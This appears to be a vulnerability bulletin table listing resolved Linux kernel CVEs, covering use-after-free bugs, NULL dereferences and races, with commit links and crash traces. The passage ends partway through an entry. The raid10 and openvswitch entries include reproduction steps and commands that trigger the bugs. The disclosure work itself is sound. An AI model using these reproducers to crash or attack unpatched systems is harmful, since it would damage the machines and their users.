| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ubi: Fix UAF wear-leveling entry in eraseblk_count_seq_show() Wear-leveling entry could be freed in error path, which may be accessed again in eraseblk_count_seq_show(), for example: __erase_worker eraseblk_count_seq_show wl = ubi->lookuptbl[*block_number] if (wl) wl_entry_destroy ubi->lookuptbl[e->pnum] = NULL kmem_cache_free(ubi_wl_entry_slab, e) erase_count = wl->ec // UAF! Wear-leveling entry updating/accessing in ubi->lookuptbl should be protected by ubi->wl_lock, fix it by adding ubi->wl_lock to serialize wl entry accessing between wl_entry_destroy() and eraseblk_count_seq_show(). Fetch a reproducer in [Link]. | 2025-12-09 | not yet calculated | CVE-2023-53826 | https://git.kernel.org/stable/c/3f9b63dfce44a7c3c095dd93d910408e07ab1845 https://git.kernel.org/stable/c/84250da1c63cb7d421a3b4812b5c2ce2e47d31a1 https://git.kernel.org/stable/c/1cb14c06d6035539ef4215c4ba0871aea71d7c38 https://git.kernel.org/stable/c/9d448dd6bcb61a508204b57ea1f454ba9bac2f24 https://git.kernel.org/stable/c/79548ccdd992707879b4b683b7251c58ddf26f12 https://git.kernel.org/stable/c/84253f3c2dad6be10d30c92626c763d9a9f512ad https://git.kernel.org/stable/c/a100de2974d208cfca032179b02ed4d1a0a7f143 https://git.kernel.org/stable/c/a240bc5c43130c6aa50831d7caaa02a1d84e1bce |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: L2CAP: Fix use-after-free in l2cap_disconnect_{req,rsp} Similar to commit d0be8347c623 ("Bluetooth: L2CAP: Fix use-after-free caused by l2cap_chan_put"), just use l2cap_chan_hold_unless_zero to prevent referencing a channel that is about to be destroyed. | 2025-12-09 | not yet calculated | CVE-2023-53827 | https://git.kernel.org/stable/c/f2d38e77aa5f3effc143e7dd24da8acf02925958 https://git.kernel.org/stable/c/1351551aa9058e07a20a27a158270cf84fcde621 https://git.kernel.org/stable/c/c02421992505c95c7f3c9ad59ee35e22eac60988 https://git.kernel.org/stable/c/d9ba36c22a7bb09d6bac4cc2f243eff05da53f43 https://git.kernel.org/stable/c/ac6725a634f7e8c0330610a8527f20c730b61115 https://git.kernel.org/stable/c/348d446762e7c70778df8bafbdf3fa0df2123f58 https://git.kernel.org/stable/c/d82a439c3cfdb28aa7e82e2e849c5c4dd9fca284 https://git.kernel.org/stable/c/a2a9339e1c9deb7e1e079e12e27a0265aea8421a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_sync: Avoid use-after-free in dbg for hci_add_adv_monitor() KSAN reports use-after-free in hci_add_adv_monitor(). While adding an adv monitor, hci_add_adv_monitor() calls -> msft_add_monitor_pattern() calls -> msft_add_monitor_sync() calls -> msft_le_monitor_advertisement_cb() calls in an error case -> hci_free_adv_monitor() which frees the *monitor. This is referenced by bt_dev_dbg() in hci_add_adv_monitor(). Fix the bt_dev_dbg() by using handle instead of monitor->handle. | 2025-12-09 | not yet calculated | CVE-2023-53828 | https://git.kernel.org/stable/c/81d8e9f59df63b8358751c1ffed9f1cf5c796909 https://git.kernel.org/stable/c/aafda69d4807f5edf3558c9534be9b911774e63a https://git.kernel.org/stable/c/8d66f7ced51cb924bc90278d6a0a26a52877271a https://git.kernel.org/stable/c/a2bcd2b63271a93a695fabbfbf459c603d956d48 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: flush inode if atomic file is aborted Let's flush the inode being aborted atomic operation to avoid stale dirty inode during eviction in this call stack: f2fs_mark_inode_dirty_sync+0x22/0x40 [f2fs] f2fs_abort_atomic_write+0xc4/0xf0 [f2fs] f2fs_evict_inode+0x3f/0x690 [f2fs] ? sugov_start+0x140/0x140 evict+0xc3/0x1c0 evict_inodes+0x17b/0x210 generic_shutdown_super+0x32/0x120 kill_block_super+0x21/0x50 deactivate_locked_super+0x31/0x90 cleanup_mnt+0x100/0x160 task_work_run+0x59/0x90 do_exit+0x33b/0xa50 do_group_exit+0x2d/0x80 __x64_sys_exit_group+0x14/0x20 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd This triggers f2fs_bug_on() in f2fs_evict_inode: f2fs_bug_on(sbi, is_inode_flag_set(inode, FI_DIRTY_INODE)); This fixes the syzbot report: loop0: detected capacity change from 0 to 131072 F2FS-fs (loop0): invalid crc value F2FS-fs (loop0): Found nat_bits in checkpoint F2FS-fs (loop0): Mounted with checkpoint version = 48b305e4 ------------[ cut here ]------------ kernel BUG at fs/f2fs/inode.c:869! invalid opcode: 0000 [#1] PREEMPT SMP KASAN CPU: 0 PID: 5014 Comm: syz-executor220 Not tainted 6.4.0-syzkaller-11479-g6cd06ab12d1a #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/27/2023 RIP: 0010:f2fs_evict_inode+0x172d/0x1e00 fs/f2fs/inode.c:869 Code: ff df 48 c1 ea 03 80 3c 02 00 0f 85 6a 06 00 00 8b 75 40 ba 01 00 00 00 4c 89 e7 e8 6d ce 06 00 e9 aa fc ff ff e8 63 22 e2 fd <0f> 0b e8 5c 22 e2 fd 48 c7 c0 a8 3a 18 8d 48 ba 00 00 00 00 00 fc RSP: 0018:ffffc90003a6fa00 EFLAGS: 00010293 RAX: 0000000000000000 RBX: 0000000000000001 RCX: 0000000000000000 RDX: ffff8880273b8000 RSI: ffffffff83a2bd0d RDI: 0000000000000007 RBP: ffff888077db91b0 R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000001 R11: 0000000000000001 R12: ffff888029a3c000 R13: ffff888077db9660 R14: ffff888029a3c0b8 R15: ffff888077db9c50 FS: 0000000000000000(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f1909bb9000 CR3: 00000000276a9000 CR4: 0000000000350ef0 Call Trace: <TASK> evict+0x2ed/0x6b0 fs/inode.c:665 dispose_list+0x117/0x1e0 fs/inode.c:698 evict_inodes+0x345/0x440 fs/inode.c:748 generic_shutdown_super+0xaf/0x480 fs/super.c:478 kill_block_super+0x64/0xb0 fs/super.c:1417 kill_f2fs_super+0x2af/0x3c0 fs/f2fs/super.c:4704 deactivate_locked_super+0x98/0x160 fs/super.c:330 deactivate_super+0xb1/0xd0 fs/super.c:361 cleanup_mnt+0x2ae/0x3d0 fs/namespace.c:1254 task_work_run+0x16f/0x270 kernel/task_work.c:179 exit_task_work include/linux/task_work.h:38 [inline] do_exit+0xa9a/0x29a0 kernel/exit.c:874 do_group_exit+0xd4/0x2a0 kernel/exit.c:1024 __do_sys_exit_group kernel/exit.c:1035 [inline] __se_sys_exit_group kernel/exit.c:1033 [inline] __x64_sys_exit_group+0x3e/0x50 kernel/exit.c:1033 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd RIP: 0033:0x7f309be71a09 Code: Unable to access opcode bytes at 0x7f309be719df. RSP: 002b:00007fff171df518 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7 RAX: ffffffffffffffda RBX: 00007f309bef7330 RCX: 00007f309be71a09 RDX: 000000000000003c RSI: 00000000000000e7 RDI: 0000000000000001 RBP: 0000000000000001 R08: ffffffffffffffc0 R09: 00007f309bef1e40 R10: 0000000000010600 R11: 0000000000000246 R12: 00007f309bef7330 R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000001 </TASK> Modules linked in: ---[ end trace 0000000000000000 ]--- RIP: 0010:f2fs_evict_inode+0x172d/0x1e00 fs/f2fs/inode.c:869 Code: ff df 48 c1 ea 03 80 3c 02 00 0f 85 6a 06 00 00 8b 75 40 ba 01 00 00 00 4c 89 e7 e8 6d ce 06 00 e9 aa fc ff ff e8 63 22 e2 fd <0f> 0b e8 5c 22 e2 fd 48 c7 c0 a8 3a 18 8d 48 ba 00 00 00 00 00 fc RSP: 0018:ffffc90003a6fa00 EFLAGS: 00010293 RAX: 0000000000000000 RBX: 0000000000 ---truncated--- | 2025-12-09 | not yet calculated | CVE-2023-53829 | https://git.kernel.org/stable/c/1c64dbe8fa3552a340bca6d7fa09468c16ed2a85 https://git.kernel.org/stable/c/bfa7853bb47fee0c17030b377c98cf4ede47ba33 https://git.kernel.org/stable/c/a3ab55746612247ce3dcaac6de66f5ffc055b9df |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/x86: think-lmi: Fix memory leak when showing current settings When retrieving an item string with tlmi_setting(), the result has to be freed using kfree(). In current_value_show() however, malformed item strings are not freed, causing a memory leak. Fix this by eliminating the early return responsible for this. | 2025-12-09 | not yet calculated | CVE-2023-53830 | https://git.kernel.org/stable/c/b9396d991abe8d1ac31a043274ab20b49f92c2e6 https://git.kernel.org/stable/c/9071525bfcb1f5674117dbed3eca0cd7b122813b https://git.kernel.org/stable/c/5f99014c19fa50a5719c0bb78143282632675893 https://git.kernel.org/stable/c/a3c4c053014585dcf20f4df954791b74d8a8afcd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: read sk->sk_family once in sk_mc_loop() syzbot is playing with IPV6_ADDRFORM quite a lot these days, and managed to hit the WARN_ON_ONCE(1) in sk_mc_loop() We have many more similar issues to fix. WARNING: CPU: 1 PID: 1593 at net/core/sock.c:782 sk_mc_loop+0x165/0x260 Modules linked in: CPU: 1 PID: 1593 Comm: kworker/1:3 Not tainted 6.1.40-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023 Workqueue: events_power_efficient gc_worker RIP: 0010:sk_mc_loop+0x165/0x260 net/core/sock.c:782 Code: 34 1b fd 49 81 c7 18 05 00 00 4c 89 f8 48 c1 e8 03 42 80 3c 20 00 74 08 4c 89 ff e8 25 36 6d fd 4d 8b 37 eb 13 e8 db 33 1b fd <0f> 0b b3 01 eb 34 e8 d0 33 1b fd 45 31 f6 49 83 c6 38 4c 89 f0 48 RSP: 0018:ffffc90000388530 EFLAGS: 00010246 RAX: ffffffff846d9b55 RBX: 0000000000000011 RCX: ffff88814f884980 RDX: 0000000000000102 RSI: ffffffff87ae5160 RDI: 0000000000000011 RBP: ffffc90000388550 R08: 0000000000000003 R09: ffffffff846d9a65 R10: 0000000000000002 R11: ffff88814f884980 R12: dffffc0000000000 R13: ffff88810dbee000 R14: 0000000000000010 R15: ffff888150084000 FS: 0000000000000000(0000) GS:ffff8881f6b00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000020000180 CR3: 000000014ee5b000 CR4: 00000000003506e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <IRQ> [<ffffffff8507734f>] ip6_finish_output2+0x33f/0x1ae0 net/ipv6/ip6_output.c:83 [<ffffffff85062766>] __ip6_finish_output net/ipv6/ip6_output.c:200 [inline] [<ffffffff85062766>] ip6_finish_output+0x6c6/0xb10 net/ipv6/ip6_output.c:211 [<ffffffff85061f8c>] NF_HOOK_COND include/linux/netfilter.h:298 [inline] [<ffffffff85061f8c>] ip6_output+0x2bc/0x3d0 net/ipv6/ip6_output.c:232 [<ffffffff852071cf>] dst_output include/net/dst.h:444 [inline] [<ffffffff852071cf>] ip6_local_out+0x10f/0x140 net/ipv6/output_core.c:161 [<ffffffff83618fb4>] ipvlan_process_v6_outbound drivers/net/ipvlan/ipvlan_core.c:483 [inline] [<ffffffff83618fb4>] ipvlan_process_outbound drivers/net/ipvlan/ipvlan_core.c:529 [inline] [<ffffffff83618fb4>] ipvlan_xmit_mode_l3 drivers/net/ipvlan/ipvlan_core.c:602 [inline] [<ffffffff83618fb4>] ipvlan_queue_xmit+0x1174/0x1be0 drivers/net/ipvlan/ipvlan_core.c:677 [<ffffffff8361ddd9>] ipvlan_start_xmit+0x49/0x100 drivers/net/ipvlan/ipvlan_main.c:229 [<ffffffff84763fc0>] netdev_start_xmit include/linux/netdevice.h:4925 [inline] [<ffffffff84763fc0>] xmit_one net/core/dev.c:3644 [inline] [<ffffffff84763fc0>] dev_hard_start_xmit+0x320/0x980 net/core/dev.c:3660 [<ffffffff8494c650>] sch_direct_xmit+0x2a0/0x9c0 net/sched/sch_generic.c:342 [<ffffffff8494d883>] qdisc_restart net/sched/sch_generic.c:407 [inline] [<ffffffff8494d883>] __qdisc_run+0xb13/0x1e70 net/sched/sch_generic.c:415 [<ffffffff8478c426>] qdisc_run+0xd6/0x260 include/net/pkt_sched.h:125 [<ffffffff84796eac>] net_tx_action+0x7ac/0x940 net/core/dev.c:5247 [<ffffffff858002bd>] __do_softirq+0x2bd/0x9bd kernel/softirq.c:599 [<ffffffff814c3fe8>] invoke_softirq kernel/softirq.c:430 [inline] [<ffffffff814c3fe8>] __irq_exit_rcu+0xc8/0x170 kernel/softirq.c:683 [<ffffffff814c3f09>] irq_exit_rcu+0x9/0x20 kernel/softirq.c:695 | 2025-12-09 | not yet calculated | CVE-2023-53831 | https://git.kernel.org/stable/c/7586a66b9c4f1b8a825ea1dfa3a91aad5cc7b89b https://git.kernel.org/stable/c/e918d0211ffbaf039447334c3460cafee1ce0157 https://git.kernel.org/stable/c/41f10a4d78fe69d685a3172e6884297f233dcf95 https://git.kernel.org/stable/c/895dc4c47171a20035cdaa8d74c1c1e97f2fc974 https://git.kernel.org/stable/c/ed4e0adfa407ab65dd73b8862ebf2f308a0349d2 https://git.kernel.org/stable/c/9036b6342fcdab190d6edce3dd447859c1de90fc https://git.kernel.org/stable/c/b1f5b890b89cb38a6c0bac91984d56cd69808e8c https://git.kernel.org/stable/c/a3e0fdf71bbe031de845e8e08ed7fba49f9c702c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid10: fix null-ptr-deref in raid10_sync_request init_resync() inits mempool and sets conf->have_replacement at the beginning of sync, close_sync() frees the mempool when sync is completed. After [1] recovery might be skipped and init_resync() is called but close_sync() is not. null-ptr-deref occurs with r10bio->dev[i].repl_bio. The following is one way to reproduce the issue. 1) create an array, wait for resync to complete, mddev->recovery_cp is set to MaxSector. 2) recovery is woken and it is skipped. conf->have_replacement is set to 0 in init_resync(). close_sync() not called. 3) some io errors and rdev A is set to WantReplacement. 4) a new device is added and set to A's replacement. 5) recovery is woken, A has replacement, but conf->have_replacement is 0. r10bio->dev[i].repl_bio will not be allocated and null-ptr-deref occurs. Fix it by not calling init_resync() if recovery skipped. [1] commit 7e83ccbecd60 ("md/raid10: Allow skipping recovery when clean arrays are assembled") | 2025-12-09 | not yet calculated | CVE-2023-53832 | https://git.kernel.org/stable/c/38d33593260536840b49fd1dcac9aedfd14a9d42 https://git.kernel.org/stable/c/14964127be77884003976a392c9faa9ebaabbbe1 https://git.kernel.org/stable/c/bdbf104b1c91fbf38f82c522ebf75429f094292a https://git.kernel.org/stable/c/68695084077e3de9d3e94e09238ace2b6f246446 https://git.kernel.org/stable/c/b50fd1c3d9d0175aa29ff2706ef36cc178bc356a https://git.kernel.org/stable/c/99b503e4edc5938885d839cf0e7571963f75d800 https://git.kernel.org/stable/c/9e9efc77efd1956cc244af975240f2513d78a371 https://git.kernel.org/stable/c/a405c6f0229526160aa3f177f65e20c86fce84c5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/i915: Fix NULL ptr deref by checking new_crtc_state intel_atomic_get_new_crtc_state can return NULL, unless crtc state wasn't obtained previously with intel_atomic_get_crtc_state, so we must check it for NULLness here, just as in many other places, where we can't guarantee that intel_atomic_get_crtc_state was called. We are currently getting NULL ptr deref because of that, so this fix was confirmed to help. (cherry picked from commit 1d5b09f8daf859247a1ea65b0d732a24d88980d8) | 2025-12-09 | not yet calculated | CVE-2023-53833 | https://git.kernel.org/stable/c/dbf25cc21beff4fd2e730573845a266504b21bb2 https://git.kernel.org/stable/c/8b3c0d2d1685ba40b0af4ee1f8d8824a73870f88 https://git.kernel.org/stable/c/a41d985902c153c31c616fe183cf2ee331e95ecb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: adc: ina2xx: avoid NULL pointer dereference on OF device match The affected lines were resulting in a NULL pointer dereference on our platform because the device tree contained the following list of compatible strings: power-sensor@40 { compatible = "ti,ina232", "ti,ina231"; ... }; Since the driver doesn't declare a compatible string "ti,ina232", the OF matching succeeds on "ti,ina231". But the I2C device ID info is populated via the first compatible string, cf. modalias population in of_i2c_get_board_info(). Since there is no "ina232" entry in the legacy I2C device ID table either, the struct i2c_device_id *id pointer in the probe function is NULL. Fix this by using the already populated type variable instead, which points to the proper driver data. Since the name is also wanted, add a generic one to the ina2xx_config table. | 2025-12-09 | not yet calculated | CVE-2023-53834 | https://git.kernel.org/stable/c/a8e2ae6296d56478fb98ae7f739846ed121f154f https://git.kernel.org/stable/c/77b689cc27d489b75d33f1a368356d70eb0ce08c https://git.kernel.org/stable/c/13f3ce53b65aa8b44cad7039d31e62c9ffd6c5d1 https://git.kernel.org/stable/c/a41e19cc0d6b6a445a4133170b90271e4a2553dc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf, sockmap: Fix skb refcnt race after locking changes There is a race where skb's from the sk_psock_backlog can be referenced after userspace side has already skb_consumed() the sk_buff and its refcnt dropped to zero causing use after free. The flow is the following: while ((skb = skb_peek(&psock->ingress_skb)) sk_psock_handle_Skb(psock, skb, ..., ingress) if (!ingress) ... sk_psock_skb_ingress sk_psock_skb_ingress_enqueue(skb) msg->skb = skb sk_psock_queue_msg(psock, msg) skb_dequeue(&psock->ingress_skb) The sk_psock_queue_msg() puts the msg on the ingress_msg queue. This is what the application reads when recvmsg() is called. An application can read this anytime after the msg is placed on the queue. The recvmsg hook will also read msg->skb and then after user space reads the msg will call consume_skb(skb) on it effectively freeing it. But, the race is in above where backlog queue still has a reference to the skb and calls skb_dequeue(). If the skb_dequeue happens after the user reads and frees the skb we have a use after free. The !ingress case does not suffer from this problem because it uses sendmsg_*(sk, msg) which does not pass the sk_buff further down the stack. The following splat was observed with 'test_progs -t sockmap_listen': [ 1022.710250][ T2556] general protection fault, ... [...] [ 1022.712830][ T2556] Workqueue: events sk_psock_backlog [ 1022.713262][ T2556] RIP: 0010:skb_dequeue+0x4c/0x80 [ 1022.713653][ T2556] Code: ... [...] [ 1022.720699][ T2556] Call Trace: [ 1022.720984][ T2556] <TASK> [ 1022.721254][ T2556] ? die_addr+0x32/0x80^M [ 1022.721589][ T2556] ? exc_general_protection+0x25a/0x4b0 [ 1022.722026][ T2556] ? asm_exc_general_protection+0x22/0x30 [ 1022.722489][ T2556] ? skb_dequeue+0x4c/0x80 [ 1022.722854][ T2556] sk_psock_backlog+0x27a/0x300 [ 1022.723243][ T2556] process_one_work+0x2a7/0x5b0 [ 1022.723633][ T2556] worker_thread+0x4f/0x3a0 [ 1022.723998][ T2556] ? __pfx_worker_thread+0x10/0x10 [ 1022.724386][ T2556] kthread+0xfd/0x130 [ 1022.724709][ T2556] ? __pfx_kthread+0x10/0x10 [ 1022.725066][ T2556] ret_from_fork+0x2d/0x50 [ 1022.725409][ T2556] ? __pfx_kthread+0x10/0x10 [ 1022.725799][ T2556] ret_from_fork_asm+0x1b/0x30 [ 1022.726201][ T2556] </TASK> To fix we add an skb_get() before passing the skb to be enqueued in the engress queue. This bumps the skb->users refcnt so that consume_skb() and kfree_skb will not immediately free the sk_buff. With this we can be sure the skb is still around when we do the dequeue. Then we just need to decrement the refcnt or free the skb in the backlog case which we do by calling kfree_skb() on the ingress case as well as the sendmsg case. Before locking change from fixes tag we had the sock locked so we couldn't race with user and there was no issue here. | 2025-12-09 | not yet calculated | CVE-2023-53836 | https://git.kernel.org/stable/c/65ad600b9bde68d2d28709943ab00b51ca8f0a1d https://git.kernel.org/stable/c/923877254f002ae87d441382bb1096d9e773d56d https://git.kernel.org/stable/c/e6b5e47adb9166e732cdf7e6e034946e3f89f36d https://git.kernel.org/stable/c/a454d84ee20baf7bd7be90721b9821f73c7d23d9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm: fix NULL-deref on snapshot tear down In case of early initialization errors and on platforms that do not use the DPU controller, the deinitialisation code can be called with the kms pointer set to NULL. Patchwork: https://patchwork.freedesktop.org/patch/525099/ | 2025-12-09 | not yet calculated | CVE-2023-53837 | https://git.kernel.org/stable/c/8f0e1ad5327a3499e7f09157cb714302a856e8a4 https://git.kernel.org/stable/c/16e0e6fb4511c004a5a0987d5bd75d9bcfb2b175 https://git.kernel.org/stable/c/8eca32b5b92a0be956a8934d7eddf4f70c107927 https://git.kernel.org/stable/c/19fe79ae816a7e3400df1eb4d27530bf9b8ae258 https://git.kernel.org/stable/c/a465353b9250802f87b97123e33a17f51277f0b1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: synchronize atomic write aborts To fix a race condition between atomic write aborts, I use the inode lock and make COW inode to be re-usable throughout the whole atomic file inode lifetime. | 2025-12-09 | not yet calculated | CVE-2023-53838 | https://git.kernel.org/stable/c/102b82708c1523b36d421cb8687746906069bc17 https://git.kernel.org/stable/c/b7724360714642099cec907f54f42e55f5325453 https://git.kernel.org/stable/c/a46bebd502fe1a3bd1d22f64cedd93e7e7702693 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dccp: fix data-race around dp->dccps_mss_cache dccp_sendmsg() reads dp->dccps_mss_cache before locking the socket. Same thing in do_dccp_getsockopt(). Add READ_ONCE()/WRITE_ONCE() annotations, and change dccp_sendmsg() to check again dccps_mss_cache after socket is locked. | 2025-12-09 | not yet calculated | CVE-2023-53839 | https://git.kernel.org/stable/c/162fa1e3cfb62aa780d7c40c8cccb6c2f8bef7c1 https://git.kernel.org/stable/c/2bdc7f272b3a110a4e1fdee6c47c8d20f9b20817 https://git.kernel.org/stable/c/67eebc7a9217f999b779d46fba5312a716f0dc1d https://git.kernel.org/stable/c/6d701c95ee6463abcbb6da543060d6e444554135 https://git.kernel.org/stable/c/f239c9e1d98b313435481b4926e8bdd06197e4d8 https://git.kernel.org/stable/c/a6ddc1c774874dc704f96a99d015dc759627bba7 https://git.kernel.org/stable/c/d1f38d313bdfc52fb2f662e66d0c60dd1cfe2384 https://git.kernel.org/stable/c/a47e598fbd8617967e49d85c49c22f9fc642704c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: early: xhci-dbc: Fix a potential out-of-bound memory access If xdbc_bulk_write() fails, the values in 'buf' can be anything. So the string is not guaranteed to be NULL terminated when xdbc_trace() is called. Reserve an extra byte, which will be zeroed automatically because 'buf' is a static variable, in order to avoid troubles, should it happen. | 2025-12-09 | not yet calculated | CVE-2023-53840 | https://git.kernel.org/stable/c/e8fb0f13e45cf361fd06593d3cb2d89915cd3bd0 https://git.kernel.org/stable/c/351c8d8650d1ccc006255fa01f98b6c6496a02e5 https://git.kernel.org/stable/c/df7c8aba7309f4dc55df94e06b67f576c0f52406 https://git.kernel.org/stable/c/a4a97ab3db5c081eb6e7dba91306adefb461e0bd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: devlink: report devlink_port_type_warn source device devlink_port_type_warn is scheduled for port devlink and warning when the port type is not set. But from this warning it is not easy found out which device (driver) has no devlink port set. [ 3709.975552] Type was not set for devlink port. [ 3709.975579] WARNING: CPU: 1 PID: 13092 at net/devlink/leftover.c:6775 devlink_port_type_warn+0x11/0x20 [ 3709.993967] Modules linked in: openvswitch nf_conncount nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nfnetlink bluetooth rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs vhost_net vhost vhost_iotlb tap tun bridge stp llc qrtr intel_rapl_msr intel_rapl_common i10nm_edac nfit libnvdimm x86_pkg_temp_thermal mlx5_ib intel_powerclamp coretemp dell_wmi ledtrig_audio sparse_keymap ipmi_ssif kvm_intel ib_uverbs rfkill ib_core video kvm iTCO_wdt acpi_ipmi intel_vsec irqbypass ipmi_si iTCO_vendor_support dcdbas ipmi_devintf mei_me ipmi_msghandler rapl mei intel_cstate isst_if_mmio isst_if_mbox_pci dell_smbios intel_uncore isst_if_common i2c_i801 dell_wmi_descriptor wmi_bmof i2c_smbus intel_pch_thermal pcspkr acpi_power_meter xfs libcrc32c sd_mod sg nvme_tcp mgag200 i2c_algo_bit nvme_fabrics drm_shmem_helper drm_kms_helper nvme syscopyarea ahci sysfillrect sysimgblt nvme_core fb_sys_fops crct10dif_pclmul libahci mlx5_core sfc crc32_pclmul nvme_common drm [ 3709.994030] crc32c_intel mtd t10_pi mlxfw libata tg3 mdio megaraid_sas psample ghash_clmulni_intel pci_hyperv_intf wmi dm_multipath sunrpc dm_mirror dm_region_hash dm_log dm_mod be2iscsi bnx2i cnic uio cxgb4i cxgb4 tls libcxgbi libcxgb qla4xxx iscsi_boot_sysfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi fuse [ 3710.108431] CPU: 1 PID: 13092 Comm: kworker/1:1 Kdump: loaded Not tainted 5.14.0-319.el9.x86_64 #1 [ 3710.108435] Hardware name: Dell Inc. PowerEdge R750/0PJ80M, BIOS 1.8.2 09/14/2022 [ 3710.108437] Workqueue: events devlink_port_type_warn [ 3710.108440] RIP: 0010:devlink_port_type_warn+0x11/0x20 [ 3710.108443] Code: 84 76 fe ff ff 48 c7 03 20 0e 1a ad 31 c0 e9 96 fd ff ff 66 0f 1f 44 00 00 0f 1f 44 00 00 48 c7 c7 18 24 4e ad e8 ef 71 62 ff <0f> 0b c3 cc cc cc cc 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 f6 87 [ 3710.108445] RSP: 0018:ff3b6d2e8b3c7e90 EFLAGS: 00010282 [ 3710.108447] RAX: 0000000000000000 RBX: ff366d6580127080 RCX: 0000000000000027 [ 3710.108448] RDX: 0000000000000027 RSI: 00000000ffff86de RDI: ff366d753f41f8c8 [ 3710.108449] RBP: ff366d658ff5a0c0 R08: ff366d753f41f8c0 R09: ff3b6d2e8b3c7e18 [ 3710.108450] R10: 0000000000000001 R11: 0000000000000023 R12: ff366d753f430600 [ 3710.108451] R13: ff366d753f436900 R14: 0000000000000000 R15: ff366d753f436905 [ 3710.108452] FS: 0000000000000000(0000) GS:ff366d753f400000(0000) knlGS:0000000000000000 [ 3710.108453] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 3710.108454] CR2: 00007f1c57bc74e0 CR3: 000000111d26a001 CR4: 0000000000773ee0 [ 3710.108456] PKRU: 55555554 [ 3710.108457] Call Trace: [ 3710.108458] <TASK> [ 3710.108459] process_one_work+0x1e2/0x3b0 [ 3710.108466] ? rescuer_thread+0x390/0x390 [ 3710.108468] worker_thread+0x50/0x3a0 [ 3710.108471] ? rescuer_thread+0x390/0x390 [ 3710.108473] kthread+0xdd/0x100 [ 3710.108477] ? kthread_complete_and_exit+0x20/0x20 [ 3710.108479] ret_from_fork+0x1f/0x30 [ 3710.108485] </TASK> [ 3710.108486] ---[ end trace 1b4b23cd0c65d6a0 ]--- After patch: [ 402.473064] ice 0000:41:00.0: Type was not set for devlink port. [ 402.473064] ice 0000:41:00.1: Type was not set for devlink port. | 2025-12-09 | not yet calculated | CVE-2023-53841 | https://git.kernel.org/stable/c/970c7035f4b03c7be9f49c403ccf6fb0b70039a1 https://git.kernel.org/stable/c/2864cc9a1fd13666ed7fd9064dc3f2c51a85de32 https://git.kernel.org/stable/c/7552020e3aa8283b215ca6b3840e6f9281ee4664 https://git.kernel.org/stable/c/408d40c729cbe3a918a381405df769491a472122 https://git.kernel.org/stable/c/21b9e0efb38eac1fe7bed369e96980cad45aa9c7 https://git.kernel.org/stable/c/a52305a81d6bb74b90b400dfa56455d37872fe4b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: codecs: wcd-mbhc-v2: fix resource leaks on component remove The MBHC resources must be released on component probe failure and removal so can not be tied to the lifetime of the component device. This is specifically needed to allow probe deferrals of the sound card which otherwise fails when reprobing the codec component: snd-sc8280xp sound: ASoC: failed to instantiate card -517 genirq: Flags mismatch irq 299. 00002001 (mbhc sw intr) vs. 00002001 (mbhc sw intr) wcd938x_codec audio-codec: Failed to request mbhc interrupts -16 wcd938x_codec audio-codec: mbhc initialization failed wcd938x_codec audio-codec: ASoC: error at snd_soc_component_probe on audio-codec: -16 snd-sc8280xp sound: ASoC: failed to instantiate card -16 | 2025-12-09 | not yet calculated | CVE-2023-53842 | https://git.kernel.org/stable/c/90ab6446eb522e31421b77bf8f45714f5668f9a3 https://git.kernel.org/stable/c/17feff71d06c96dea1fa72451c20d411e9d5ac8f https://git.kernel.org/stable/c/ce4059e1c0aca972446e06c09ee09a0d2ba5df54 https://git.kernel.org/stable/c/a5475829adcc600bc69ee9ff7c9e3e43fb4f8d30 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: openvswitch: reject negative ifindex Recent changes in net-next (commit 759ab1edb56c ("net: store netdevs in an xarray")) refactored the handling of pre-assigned ifindexes and let syzbot surface a latent problem in ovs. ovs does not validate ifindex, making it possible to create netdev ports with negative ifindex values. It's easy to repro with YNL: $ ./cli.py --spec netlink/specs/ovs_datapath.yaml \ --do new \ --json '{"upcall-pid": 1, "name":"my-dp"}' $ ./cli.py --spec netlink/specs/ovs_vport.yaml \ --do new \ --json '{"upcall-pid": "00000001", "name": "some-port0", "dp-ifindex":3,"ifindex":4294901760,"type":2}' $ ip link show -65536: some-port0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000 link/ether 7a:48:21:ad:0b:fb brd ff:ff:ff:ff:ff:ff ... Validate the inputs. Now the second command correctly returns: $ ./cli.py --spec 